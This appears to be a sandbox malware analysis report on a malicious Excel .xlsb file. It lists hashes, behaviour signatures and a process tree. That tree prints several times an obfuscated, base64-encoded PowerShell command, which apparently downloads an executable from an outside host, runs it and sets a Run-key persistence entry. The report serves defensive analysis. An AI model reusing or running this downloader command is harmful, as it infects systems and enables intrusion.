0a4bc12bdcd24aabd6cb2711654e17a513f442fec08026387f953d6b1baa3768

General

Target

ORDER Password 016.xlsb
Size

22KB
MD5

467cd2162bedb716002e3c092eee5dd9
SHA1

75c1029048796673ac7c2eb594e6470f6efce826
SHA256

0a4bc12bdcd24aabd6cb2711654e17a513f442fec08026387f953d6b1baa3768
SHA512

9ae0086d185e4b3075e008b92b3cecab4ab85d49429796235cbb1cb2584380a8b122746e028a79d846ddbfb76a2778fbdc8bb47d36827c3a53cc126338ef074d

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1544	4648	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2224	4648	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4760	4648	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	632	4648	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1768	4648	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

34 4640 powershell.exe
35 4640 powershell.exe
36 3948 powershell.exe
37 4104 powershell.exe
38 64 powershell.exe

flow	pid	process
34	4640	powershell.exe
35	4640	powershell.exe
36	3948	powershell.exe
37	4104	powershell.exe
38	64	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4648 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
1508	powershell.exe
1508	powershell.exe
1508	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

EXCEL.EXE

pid process

4648 EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE
4648	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4648 wrote to memory of 1544	4648	EXCEL.EXE	cmd.exe
PID 4648 wrote to memory of 1544	4648	EXCEL.EXE	cmd.exe
PID 1544 wrote to memory of 4640	1544	cmd.exe	powershell.exe
PID 1544 wrote to memory of 4640	1544	cmd.exe	powershell.exe
PID 4648 wrote to memory of 2224	4648	EXCEL.EXE	cmd.exe
PID 4648 wrote to memory of 2224	4648	EXCEL.EXE	cmd.exe
PID 2224 wrote to memory of 3948	2224	cmd.exe	powershell.exe
PID 2224 wrote to memory of 3948	2224	cmd.exe	powershell.exe
PID 4648 wrote to memory of 4760	4648	EXCEL.EXE	cmd.exe
PID 4648 wrote to memory of 4760	4648	EXCEL.EXE	cmd.exe
PID 4760 wrote to memory of 4104	4760	cmd.exe	powershell.exe
PID 4760 wrote to memory of 4104	4760	cmd.exe	powershell.exe
PID 4648 wrote to memory of 632	4648	EXCEL.EXE	cmd.exe
PID 4648 wrote to memory of 632	4648	EXCEL.EXE	cmd.exe
PID 632 wrote to memory of 64	632	cmd.exe	powershell.exe
PID 632 wrote to memory of 64	632	cmd.exe	powershell.exe
PID 4648 wrote to memory of 1768	4648	EXCEL.EXE	cmd.exe
PID 4648 wrote to memory of 1768	4648	EXCEL.EXE	cmd.exe
PID 1768 wrote to memory of 1508	1768	cmd.exe	powershell.exe
PID 1768 wrote to memory of 1508	1768	cmd.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER Password 016.xlsb"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcA